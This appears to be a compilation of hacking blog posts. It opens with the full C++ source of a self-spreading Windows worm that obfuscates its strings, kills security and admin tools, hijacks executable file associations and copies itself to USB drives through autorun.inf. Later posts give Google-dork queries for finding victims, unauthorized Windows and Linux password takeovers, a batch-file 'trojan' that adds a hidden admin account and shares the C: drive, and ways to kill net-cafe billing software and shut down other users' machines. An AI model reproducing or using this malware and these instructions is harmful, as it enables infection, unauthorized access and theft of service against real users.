worm source code...

worm source code...
/* HijackeR.cpp */

/***
*#####The HijackeR worm #####
*#####author: "v" #####
*#####Team: Legion Of Xtremers #####
******Description******
*The HijackeR worm hijacks the windows boxes and replaces the exe loader.
*The HijackeR worm can be modified to replace the loaders of any kind of files.
*The HijackeR worm executes with the logged-on user privileges.
*It infects the removable storage drives.
*
***/

#include
#include
#include
#include
#include

/*********************Constants & Macro Definition Circuit*******************/
#define MAXBUFFER 1024
#define MINBUFFER 360
#define FILEATTRIB 34
#define PROCESSPATH "C:\\Documents and Settings\\vinnu\\develop\\worm\\HijackeR\\debug\\HijackeR.exe"
#define WORMFILE "HijackeR.exe"
#define COVER "GrandVitara.mp3.exe"
#define COVERPATH "\\GrandVitara.mp3.exe"

using namespace std;

/***************Global Section**************/
HINSTANCE hInstance;
HANDLE hSnapShot;
HANDLE hProcHunted;
STARTUPINFO sui;
PROCESS_INFORMATION pi;
TOKEN_PRIVILEGES tkpn;

char procfile[MAXBUFFER], remotemodule[MAXBUFFER];
bool jump = false;

char *szKey[MINBUFFER];
char *crBuffer[MINBUFFER];
char decrypt[50][MINBUFFER];
char *szcrypt[MAXBUFFER];
char szdecrypt[50][MAXBUFFER];

/***************Shared Section**************/
//*****not implemented now******
#pragma data_seg ("HijackeD")
char szStatus[MAXBUFFER];
HMODULE hmKernel;
#pragma data_seg()

/***************Vein Functions Definition & Prototype Circuit****************/
oid keyAllocator(void) {
szKey[0] = "\xd8\x94\x8c\xac\xdd\x9a\xdf\xee\xaa\xbf\xac\xb1\x9d\xbc\x9c\x8e\x94\xda\x9f\xac\xaa\x8d\x9d\xef\xd7\xa4";
szKey[1] = "\x8f\xaa\xde\xad\xfd\xda\x9d\xe5\x9f\xac\xda\x9d\xf7\xbc\xdf\xee\xad\xbf\xec\x8c\xac\xdd\x9d\xef\xd7\xfd";
szKey[2] = "\xbf\xac\xaa\x8d\xd8\x97\xdf\xe4\xcd\xbf\xa2\xa9\xc7\xbc\xb3\x9e\x94\xfa\xfc\xac\xbf\xac\xaa\x8d\xd9\xf4";
szKey[3] = "\xbb\x9c\x8c\xcd\xb9\xc1\xdf\xee\x8d\xb1\x9c\xca\xee\xbc\x9c\x8e\x94\xdc\xeb\x8c\xac\xdd\x9d\xef\xd7\xc6";
szKey[4] = "\xcb\xb1\xb3\xac\xdd\x9a\xd8\xb3\xbd\xbf\xcc\xda\xb3\xbc\x9c\xce\x94\xdf\xee\xad\xbf\xdd\x9d\xd8\xd7\x99";
szKey[5] = "\xfd\xae\x8c\xae\xb3\xe9\xdf\xee\xaf\xea\x9d\xe5\xac\xbc\x9c\xee\xe9\xda\x9d\xb1\xac\xdd\x9d\xb6\xd7\xb1";
szKey[6] = "\xe9\xcd\x8c\xec\xdd\xcd\xab\xee\xea\xbf\xac\xb3\xdd\xbc\x9c\x8e\x94\xda\xe9\x8c\xac\xdd\x9d\xef\xd7\x9f";
szKey[7] = "\xf5\xbd\x8c\xb1\xd8\xd8\xde\x9e\x9a\xbf\x8c\xee\x9c\xfd\xea\x9d\xe5\xda\xfd\xea\x9d\xe5\x9d\xe9\xb6\xf8";
szKey[8] = "\xae\xe9\x8c\xac\xdd\xaa\xdf\xce\xa3\xbf\xfc\xcd\x8e\xbc\x9c\x8e\x94\xda\xeb\x8c\xac\xdd\x9d\xec\xd7\xa7";
szKey[9] = "\xad\xbf\xac\xaa\x8d\xbf\xac\xda\x8d\xbf\xdc\x9a\xcf\xbc\xb1\x8e\x94\xda\xeb\x8c\xac\xdd\x9d\xef\xd7\xb3";
szKey[10] = "\xea\xd4\xfe\xb1\xdd\xcd\xdf\xe9\xad\xb1\xac\xaf\x8d\xbc\x9c\x8e\x94\xda\xcb\x8c\xac\xdd\x9d\xef\xd7\xe7";
szKey[11] = "\xb1\xf4\x8c\xbc\xd8\xdf\xb1\xee\xb3\xbf\xbf\xac\xa5\x8d\x9c\x8e\x94\xd8\xe8\x8c\xac\xfd\xea\x9d\xe5\xb6";
szKey[12] = "\x90\xb3\xdf\xde\xad\xed\xb3\xe3\xad\xbf\xe9\xa8\x8d\xbc\x9c\x8e\xb1\xda\x9b\x8c\xac\xed\x9d\xdf\xd7\xa4";
szKey[13] = "\xde\xea\x9d\xe5\x8d\xb1\xdf\xae\x9d\xd8\xac\xba\xb3\xbc\x9c\xd8\x94\xda\xe9\xd8\xac\xdd\xaf\xe8\xd7\xc0";
szKey[14] = "\xcf\x9c\x8c\xaf\xdd\xfd\xea\x9d\xe5\xbf\xac\xd8\x8d\xbc\x9c\x8e\x94\xda\xeb\x8c\xac\xdd\xcd\x8f\xd3\xe9";
szKey[15] = "\xdb\xb1\xb3\xab\xab\x8a\xd4\xb1\xb8\xbd\xc6\xd1\xb0\xdd\xfa\xae\xa7\x9f\xe3\xaf\xb8\xd1\x98\xd5\xdf\x93";
szKey[16] = "\x95\xfd\x8c\xb1\xdf\xde\xfc\xfd\x9a\x9c\xfd\xea\x9c\xfd\xea\x9d\xe5\xda\xfd\xea\x9d\xe5\x9d\xe9\xb6\xf8";
szKey[17] = "\xa2\xbf\x8f\xaa\x87\x9f\x9c\xd2\x87\x8f\xcf\x8a\xcf\x9f\xf1\xde\x9c\xfd\xef\x84\xac\xd4\x94\xef\xde\xb2";
szKey[18] = "\xc5\xa1\xe7\xb5\xd8\xd3\xb1\xea\xd0\xd1\x9c\xfd\xa7\x8d\xc7\xae\xb4\xd8\xd4\xde\x9c\xf4\xea\x9d\xe6\xd0";
szKey[19] = "\xf7\xda\x9f\xd5\xfa\x98\xa0\xd1\x82\x97\xf1\xb6\xf0\xfd\xa8\xf1\xc2\x8d\xcd\x8c\xac\xff\xc6\xa0\xb7\x84";
szKey[20] = NULL;

}

void decryptor(void) {
int maxb=19;
/*
lpszBuffer[0] = "exefile\\shell\\open\\command";
lpszBuffer[1] = "batfile\\shell\\open\\command";
lpszBuffer[2] = " \"%1\" %*";
lpszBuffer[3] = "LOX -- The Legion Of Xtremers";
lpszBuffer[4] = ".exe";
lpszBuffer[5] = "\\Autorun.inf";
lpszBuffer[6] = "[autorun]\nopen=%s";
lpszBuffer[7] = "cmd.exe";
lpszBuffer[8] = ".msc";
lpszBuffer[9] = "task";
lpszBuffer[10] = "userprofile";
lpszBuffer[11] = "\\My Documents";
lpszBuffer[12] = "hijacker.exe";
lpszBuffer[13] = "ntkernel.exe";
lpszBuffer[14] = "svchost.exe";
lpszBuffer[15] = "Kernel32.dll";
lpszBuffer[16] = "(Default)";
lpszBuffer[17] = "w";
lpszBuffer[18] = "open";
lpszBuffer[19] = "marschella-esculenta"; // antidote to kill the worm.
lpszBuffer[20] = NULL;
*/
szcrypt[0] = "\xbd\xec\xe9\xca\xb4\xf6\xba\xb2\xd9\xd7\xc9\xdd\xf1\xe0\xf3\xfe\xf1\xb4\xc3\xcf\xc5\xe0\xf0\x8e\xb9\xc0";
szcrypt[1] = "\xed\xcb\xaa\xcb\x94\xb6\xf8\xb9\xec\xc4\xbf\xf1\x9b\xe0\xb0\x9e\xc8\xd1\xb0\xef\xc3\xb0\xf0\x8e\xb9\x99";
szcrypt[2] = "\x9f\x8e\x8f\xbc\xfa\xb7\xfa\xce";
szcrypt[3] = "\xf7\xd3\xd4\xed\x94\xec\xff\xba\xe5\xd4\xbc\x86\x8b\xdb\xf5\xe1\xfa\xfc\xa4\xea\x8c\x85\xe9\x9d\xb2\xab\xde\xee\xff";
szcrypt[4] = "\xe5\xd4\xcb\xc9";
szcrypt[5] = "\xa1\xef\xf9\xda\xdc\x9b\xaa\x80\x81\x83\xf3\x83";
szcrypt[6] = "\xb2\xac\xf9\x98\xb2\xbf\xde\x80\xb7\xb5\xc3\xc3\xb8\xd2\xa1\xab\xe7";
szcrypt[7] = "\x96\xd0\xe8\x9f\xbd\xa0\xbb";
szcrypt[8] = "\x80\x84\xff\xcf";
szcrypt[9] = "\xd9\xde\xdf\xc1";
szcrypt[10] = "\x9f\xa7\x9b\xc3\xad\xbf\xb0\x8f\xc4\xdd\xc9";
szcrypt[11] = "\xed\xb9\xf5\x9c\x9c\xb0\xd2\x9b\xde\xda\xd1\xd8\xd6";
szcrypt[12] = "\xf8\xda\xb5\xbf\xce\x86\xd6\x91\x83\xda\x91\xcd";
szcrypt[13] = "\xb0\x9e\xf6\x80\xff\xdf\xba\xc2\xb3\xbd\xd4\xdf";
szcrypt[14] = "\xbc\xea\xef\xc7\xb2\x8e\x9e\xb3\x80\xc7\xc9";
szcrypt[15] = "\x90\xd4\xc1\xc5\xce\xe6\xe7\x83\x96\xd9\xaa\xbd";
szcrypt[16] = "\xbd\xb9\xe9\xd7\xbe\xab\x90\x89\xb3";
szcrypt[17] = "\xd5";
szcrypt[18] = "\xaa\xd1\x82\xdb";
szcrypt[19] = "\x9a\xbb\xed\xa6\x99\xf0\xc5\xbd\xee\xf6\xdc\xd3\x83\x9e\xdd\x9d\xa7\xe3\xb9\xed";
szcrypt[20] = NULL;

/*********** The one-time-pad decryptor-engine**************/
for (int i = 0; i < maxb; i++) {
for (int d = 0, k = 0; d < lstrlen(szcrypt); d++, k++) {
if (k == lstrlen(szKey)) k = 0;
szdecrypt[d] = szcrypt[d] ^ szKey[k];
}
szdecrypt[d] = '\0';
}
/***********************************************************/
}
void sysFunc(void) {

SHEmptyRecycleBin(NULL, NULL, SHERB_NOCONFIRMATION|SHERB_NOPROGRESSUI|SHERB_NOSOUND);

}

WINAPI defender(LPSTR szProcessName) {
HANDLE hProcess;
PROCESSENTRY32 pe = { sizeof (PROCESSENTRY32)};

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
defStart:
if (Process32First(hSnapShot, &pe)) {
do {
if (!strcmp(pe.szExeFile, szProcessName)) {
hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pe.th32ProcessID);
TerminateProcess(hProcess, 1);
CloseHandle(hProcess);hProcess = NULL;
}
Sleep(15);
} while (Process32Next(hSnapShot, &pe));
CloseHandle(hSnapShot);hSnapShot = NULL;
}

Sleep(25);
goto defStart;

return true;
}

WINAPI killerIgniter(void) {

HANDLE killers[50];
int max = 13;
/*
char *szDenyProcs[MINBUFFER];
szDenyProcs[0] = "rstrui.exe";
szDenyProcs[1] = "tasklist.exe";
szDenyProcs[2] = "taskkill.exe";
szDenyProcs[3] = "taskman.exe";
// szDenyProcs[3] = "taskmgr.exe";
szDenyProcs[4] = "regedit.exe";
szDenyProcs[5] = "reg.exe";
szDenyProcs[6] = "regdit32.exe";
szDenyProcs[7] = "regdit.exe";
szDenyProcs[8] = "cmd.exe";
szDenyProcs[9] = "mmc.exe";
szDenyProcs[10] = "wscript.exe";
szDenyProcs[11] = "command.exe";
szDenyProcs[12] = "MDM.exe";
szDenyProcs[13] = NULL;
*/
/*****************Decryption Circuit********************/

crBuffer[0] = "\xaa\xe7\xf8\xde\xa8\xf3\xf1\x8b\xd2\xda";
crBuffer[1] = "\xfb\xcb\xad\xc6\x91\xb3\xee\x91\xb1\xc9\xa2\xf8";
crBuffer[2] = "\xcb\xcd\xd9\xe6\xb3\xfe\xb3\x88\xe3\xda\xda\xcc";
// crBuffer[3] = "\xcf\xfd\xff\xa6\xd4\xa0\xb1\xc0\xe8\xc9\xf9";
crBuffer[3] = "\xcf\xfd\xff\xa6\xd4\xa6\xad\xc0\xe8\xc9\xf9";
crBuffer[4] = "\xb9\xd4\xd4\xc9\xb9\xf3\xac\x9d\xd8\xc7\xa9";
crBuffer[5] = "\x8f\xcb\xeb\x80\xd6\x91\xba";
crBuffer[6] = "\x9b\xa8\xeb\x88\xb4\xb9\x98\xdc\xc4\xda\xd4\xd6";
crBuffer[7] = "\x87\xd8\xeb\xd5\xb1\xac\xf0\xfb\xe2\xda";
crBuffer[8] = "\xcd\x84\xe8\x82\xb8\xd2\xba";
crBuffer[9] = "\xc0\xd2\xcf\x84\xe8\xc7\xc9";
crBuffer[10] = "\x9d\xa7\x9d\xc3\xb4\xbd\xab\xc7\xc8\xc9\xc9";
crBuffer[11] = "\xd2\x9b\xe1\xd1\xb9\xb1\xd5\xc0\xd6\xc7\xda";
crBuffer[12] = "\xdd\xf7\x92\xf0\xc8\x95\xd6";
crBuffer[13] = NULL;

for (int i = 0; i < max; i++) {
for (int d = 0; d < lstrlen(crBuffer); d++) {
decrypt[d] = crBuffer[d] ^ szKey[d];
}
decrypt[d] = '\0';
}
/******************************killer threads circuit********************************/

for (int a = 0; a < max; a++) {
killers[a] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) defender, decrypt[a], 0, 0);
Sleep(15);
}

// next circuit is disabled b'coz the delay buffer is required whereas it clears off the buffer.
/* for (i = 0; i < max; i++) {
for (int d=0; d < lstrlen(decrypt); d++) {
decrypt[d] = '\0';
}
}
*/

return true;
}
BOOL procLoader(char szProc[MINBUFFER], char szParam[MAXBUFFER]) {
BOOL resProc;
for (int a=0; szProc[a] != '\0'; a++) {
szProc[a] = (char)tolower((int)szProc[a]);
}

if ((strstr(szProc, szdecrypt[7])) != NULL) {
ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[8])) != NULL) {
ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[9])) != NULL) {
ExitProcess(1);
// } else if ((strstr(szProc, "notepad")) != NULL || (strstr(szProc, "paint")) != NULL || (strstr(szProc, "calc")) != NULL) {
// goto checkpass;
// } else if ((strstr(szProc, "system32")) != NULL) {
// ExitProcess(1);
} else if ((strstr(szProc, szdecrypt[12])) != NULL || (strstr(szProc, szdecrypt[13])) != NULL) {
return jump = true;
} else {
// Code to do.
}

checkpass:
memset(&sui, 0, sizeof(STARTUPINFO));
sui.cb = sizeof(STARTUPINFO);
sui.hStdError = GetStdHandle(STD_ERROR_HANDLE);
sui.hStdInput = GetStdHandle(STD_INPUT_HANDLE);
sui.hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);
sui.dwFlags = STARTF_USESTDHANDLES;

char szDirectory[MAXBUFFER];
strcpy(szDirectory, getenv(szdecrypt[10]));
strcat(szDirectory, szdecrypt[11]);

resProc = CreateProcess(szProc, szParam, NULL,
NULL, TRUE, 0, NULL,
szDirectory, &sui, &pi);
return resProc;
}
BOOL oprocSniper(LPSTR szProcName) {
HANDLE hoProc;
PROCESSENTRY32 pc = { sizeof (PROCESSENTRY32)};
begin:

hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);

if (Process32First(hSnapShot, &pc)) {
do {
if (!strcmp(pc.szExeFile, szProcName)) {
if (pc.th32ProcessID != GetCurrentProcessId())
hoProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pc.th32ProcessID);
TerminateProcess(hoProc, 1);
CloseHandle(hoProc);hoProc = NULL;
} else if (!strcmp(pc.szExeFile, CODENAME)) {
if (pc.th32ProcessID != GetCurrentProcessId())
hoProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pc.th32ProcessID);
TerminateProcess(hoProc, 1);
CloseHandle(hoProc);hoProc = NULL;
}

Sleep(5);
} while (Process32Next(hSnapShot, &pc));

CloseHandle(hSnapShot);
}
Sleep(20);
goto begin;
return NULL;
}

void driveCloner(void) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);

FILE *fp;

char drive[3], newloc[30], autof[20];

int let = 0x43;

for (int i = 0; i < 256; i++, let++) {

if (i == 255)

i = 0;

if (let > 0x5A)

let = 0x43;

drive[0] = (char)let;

drive[1]= ':';

drive[2] = '\0';


if ((GetDriveType(drive)) == 2) {

// This line fetches the removable drives.

strcpy(newloc, drive);
strcat(newloc, COVERPATH);

strcpy(autof, drive);

CopyFile(remotemodule, newloc, 0);

// If not then copy the file.

strcat(autof, szdecrypt[5]);

SetFileAttributes(autof, 28);
fp = fopen(autof, szdecrypt[17]);
if (fp != NULL) {
fprintf(fp, szdecrypt[6], COVER);
fclose(fp);
}

SetFileAttributes(newloc, FILEATTRIB);

}

Sleep(80);
}
}
DWORD WINAPI hijackSettings (void) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_ABOVE_NORMAL);
HKEY hResult, hResult1;
bool batsman = false;

LPCTSTR hSubKey = szdecrypt[0];
LPCTSTR hSubKey1 = szdecrypt[1];

char dat[MINBUFFER];
strcpy(dat, remotemodule);
strcat(dat, szdecrypt[2]);

if (RegOpenKeyEx(HKEY_CLASSES_ROOT, hSubKey, 0, KEY_ALL_ACCESS, &hResult) == ERROR_SUCCESS) {

if (RegOpenKeyEx(HKEY_CLASSES_ROOT, hSubKey1, 0, KEY_ALL_ACCESS, &hResult1) == ERROR_SUCCESS) {
RegDeleteValue(hResult1, szdecrypt[16]);
batsman = true;
}

RegDeleteValue(hResult, szdecrypt[16]);

while(true) {
RegSetValueEx(hResult, NULL, 0, REG_SZ, (const unsigned char *)dat, sizeof (dat) );

if (batsman == true)
RegSetValueEx(hResult1, NULL, 0, REG_SZ, (const unsigned char *)dat, sizeof (dat) );
Sleep(50);
}

}
return TRUE;
}

DWORD WINAPI privilAdj(void) {
HANDLE hToken;

hInstance = GetModuleHandle(szdecrypt[15]);
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkpn.Privileges[0].Luid);
tkpn.PrivilegeCount = 1;
tkpn.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, 0, &tkpn, sizeof (tkpn), NULL, NULL);
CloseHandle(hToken);
}

return true;
}

void titleFinder(void) {
while(true) {
SetWindowText(FindWindow(NULL, remotemodule), szdecrypt[3]);
Sleep(80);
}
}
/***************Worm's Main Engine Circuit****************/
int main(int argc, char* argv[]) {
try {

keyAllocator();
decryptor();
privilAdj();

HANDLE hSniper = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)oprocSniper, szdecrypt[13], 0, 0);
HANDLE hKiller = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)killerIgniter, NULL, 0, 0);


SetThreadPriority(hKiller, THREAD_PRIORITY_TIME_CRITICAL);

char *ptr;
ptr = argv[0];procfile[0] = '\0';

strcpy(remotemodule, getenv("allusersprofile"));
strcat(remotemodule, "\\Documents\\ntkernel.exe");

HANDLE hTitle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)titleFinder, NULL, 0, 0);

strncpy(procfile, ptr, MAXBUFFER-1);
if ((strstr(ptr, szdecrypt[4])) == NULL) strcat(procfile, szdecrypt[4]);

char szProcess[MINBUFFER], szParameter[MAXBUFFER];
szProcess[0] = szParameter[0] = '\0';

if (argc >=2) {
strncpy(szProcess, argv[1], MINBUFFER-10);

if (argc >= 3) {
for (int i = 2 ;(i+1) <= argc; i++) {
strcat(szParameter, argv);
strcat(szParameter, " ");
}
}
procLoader(szProcess, szParameter);
}

if (jump == true) {
Sleep(11000);
}

CopyFile(procfile, remotemodule, 0);

HANDLE htHijack = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)hijackSettings, NULL, 0, 0);
SetThreadPriority(htHijack, THREAD_PRIORITY_ABOVE_NORMAL);
HANDLE hdCloner = CreateThread (0, 0,(LPTHREAD_START_ROUTINE)driveCloner, NULL, 0, 0);
SetThreadPriority(hdCloner, THREAD_PRIORITY_ABOVE_NORMAL);

sysFunc();

if (hdCloner != NULL) {
WaitForSingleObject(hdCloner, 1000);
}

ShellExecute(NULL, szdecrypt[18], remotemodule, NULL, NULL, HIDE_WINDOW);
} catch (...) {
ExitProcess(1);
}

return EXIT_SUCCESS;
}

Books for hacking

Books for hacking
Only For Educational Purpose (U understand wat that mean)

Search in google

-inurl:htm -inurl:html intitle:"index of" +("/ebooks"|"/book") +(chm|pdf|zip) +"hacking" "Last Modified"


Or Direct Link


http://www.google.com/search?hl=en&lr=&q=-inurl%3Ahtm+-inurl%3Ahtml+intitle%3A%22index+of%22+%2B%28%22%2Febooks%22%7C%22%2Fbook%22%29+%2B%28chm%7Cpdf%7Czip%29+%2B%22hacking%22%20%22Last%20Modified%22&btnG=Search

Art of pishing

the art of phishing
any ideas on how to stop phishing sites... can there be any automated ways.. a new computer/internet user will definitely get phished since he/she doesnt know about the technicalities of the same...

any ideas/views ...something like a anti-phish filter...can we join hands to make one???

Lucky ansari

www.greyhatindia.com

Notepad,funny trick

Notepad Secret and Funny Trick
Notepad Secret and Funny Trick
A funny trick You can do using Notepad in Windows XP.

Open Notepad.
Type the words as follows:
Bush hid the facts.

Now save the file (give it any name you like), close the notepad.
open it again. ou will se Square characters instead of the words you had written.
It Works Only with XP.

It works with certain names. It worked with:
bush
saddam
tony blair
kieran
carl
de

windows,hacking tips

ultimate ankit fadia windows,hacking tips
http://300allpctips.blogspot.com/
http://windowsultimatedetails.blogspot.com/
http://googlesecretsandtips.blogspot.com/
http://registrysnacks.blogspot.com/

Spider hacking

Its time to do some serious stuff, but in small time interval, here is the tutorial:

Spider Hacking: this kind of hacking is also known as search engine hacking, bcoz search engines are infact the spiders and simple naive users call'm search engines, leave it..

Let's start with google search engine:


every search engine have some directives (mostly which provide the advance search) and use of these directives can be of immense help, like developing an on the fly disaster management program, exact information extraction system, etc... hackers use these techniques for identifying the victims within seconds and launch the attacks without even using any exploit. letrs do it, get set and finally go:

directives:

1. intext:
this directive can be used to search any text inside the document body, the multiword text must be placed inside the double quotes and single word no problem,
remember directives only in lower case and no space after and before":"

we can use "+" and "-" signs for more specific search, e.g:

intext:cars - intext:"maruti suzuki"
above query will search for all pages having cars written but NOT those pages which include the "maruty suzuky".

the data or text is not case sensitive.

2. inurl:
this directive is deadly and searches for those pages having specific portion in their url portion as follows:

inurl:admin

this will list all those pages having admin in their url (the address).

inurl:"/admin/order"
will list all pages which are inside the /admin/order and so on directory.

3. intitle:
this directive is also deadly and can retrieve all those pages which has the specified text inside their title.

note: we can also use the wild cards..e.g. "*" for group and "." for single character.

e.g:

intitle:"Microsoft IIS 3.0*"

this will retrieve all those pages which have "Microsoft IIS 3.0..." as their title
this will lead to finding vulnerable hosts in seconds,.....we got the victim"
(place the portion of exact title by opening such pages i find the titles of all vulnerable softwares default pages and vulnerability scanners generated report pages titles and search for them, a real victim scanner is developed, in few lines by u, isn't it...

type the following in google search box:

intitle:"index.of" inurl:admin

and check out the results.

next is ..
4. site:
this directive will search within a site or domain like this:
site:www.victim.com intitle:"index.of*"

will search for all those pages (actually in this case it will open the folder with browse property on).

note: to use inurl and site togather is mostly worthless.

5. inanchor:
will list all those pages which have the anchor text as specified...
e.g:

inanchor:"My Secrets"
will search for all those pages which have a hyperlink with text "My Secrets"

6. link:
the link provides all those pages which have a link for specified address. like href address in anchors.
6. filetype:

this directive is most deadliest and is used to search for specific file type like to search for excel file specify its extension withouit . as:

filetype:xls inurl:india

above search query will retrieve all excel files found in india directory or named india.
i like the following concept of the yahoo, in which we can find out whether a user is online or not, .. in internet browser in address bar type:

opi.yahoo.com/online?u=yahooID&m=g&t=2

where u=userID is a variable and needs the yahoo userID

m = method of status specification
"g" returns the graphic and "t" in text

t type of text or graphic
t can be from 1, 2, 3 and 2 for largest size, 1 for medium, 3 for smallest size.
e.g:

opi.yahoo.com/online?u=vinkat007&m=g&t=1

Hacking in Linux

Hacking in Linux
This worked in Red Hat (where multiple users existed).
Open the \etc\shadow file and simply cut and paste your own password over another user's password. There you go. You can now use that account using your own password.

Note:I've tried this on several earlier versions. I bet it'll work on 5. Will have to try it out on 11.

CHANGE ADMINISTRATOR password

Change Even administrater's password.
This works if you want to hack someone else's account on your pc bit do not know his/her password.
Click on START-->RUN.
Type compmgmt.msc & press enter.
In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.
Then in the right pane, select the user name whose account you want to hack.
RIGHT CLICK and then click on SET PASSWORD from the pop-up menu.
Enter the new password.
Click on OK.
There you have it.
You have changed the user's password!

SECOND METHOD
there are several methods available to change administrators passwords, but i am not going to discus any third party tool here (i don't want to publicize any commercial tool here)...
in command console or run dialogue box, type:

net user administrator

and thats it it is changed, but how to change it if u are not aDMIN,...THATS THE RECIPIE OF QUESTION?

there are several ways, if you anytime found computer unattended, then make an password reset disk by selecting the administrator user from user management from control panel "prevent typing wrong passwords" and then insert a floppy disk, next time any time reboot system and intentionally type wrong passworde aND WHEN asked insert the password reset disk and u can change the password for administrator.

and the RAMBan OF ALL THE HACKS IS THAT , INSERT A WINDOWS INSTALLATION DISK AND REBOOT THE SYSTEM AND SELECT the listed installation and select the REPAIR (not recovery console..NO..NOT)
remember the repair, and then when it will again reboot and the repairing process will start (showing the "installing devices" progress bar) press the SHIFT+F10 and there u will get the command console, now type taskmgr immegiately and endtask (terminate or keep on, it will then refresh the window) the setup.exe and then in console window type in the above listed command to change the users password, u can change any user's password by eliminating administrator with user id, and there u go.

u can also use knoppix if want to retrieve the data or there are several password changers available...but dont use them,..all in alll....secure systems physically also, don't prey upon other's intellectual property.
it is offensive and a criminal act....beware

and once more, there are certainly other methods also. sometimes the administrators password can be retrieved from registry backups in plain text if the autologon is enabled....

How to increase the power of ur pc

Follow the given steps to end the idle tasks:

*

To enable this feature, you will need to be logged into your computer with administrative rights.
*

Click Start button and click on Run option.
*

In the Run box, type the command Rundll32.exe advapi32.dll,ProcessIdleTasks command and press Ok button.

Here system will take some time to end the background idle tasks

Make ur own virus torzan

Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

---------------------- Starting -------------------
-:Server:-

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want

Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.
-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.

Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!

CD-ROM virus

Basic overview of this tutorial is if there's some kind of timer or client
software on the computer you're using at the Net Cafe you can hopefully disable it.

Firstly we need to gain access to command prompt (cmd.exe) to do this there's a few
ways.

1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.
Say that's disabled then we can try some other methods.

2) Press the Windows Logo + R and it will start run up. (hopefully)

3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.

4) Open notepad type "cmd.exe" without the quotation marks ("") and then
go to File/Save As.. and type the name for the file and have it end with
.bat for example "MyNewFile.bat" and select Save as type and select All Files.

Make sure to save it somewhere you can access it, Like the desktop.

If they have deleted Notepad then go in to Internet Explorer and right click
and select View Source or on the menu bar click View then source and perform the
same process as above.

Once you have done this you can run the file. If you can't open files from the desktop
then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to
the Desktop and it will show the saves files on the desktop in a folder type window.


Once you have access to command prompt you can perform some usefull actions e.g shutdown
programs, shutdown other peoples computers, add new accounts.

Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.



For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.


Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.


Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.



Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in
handy)

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

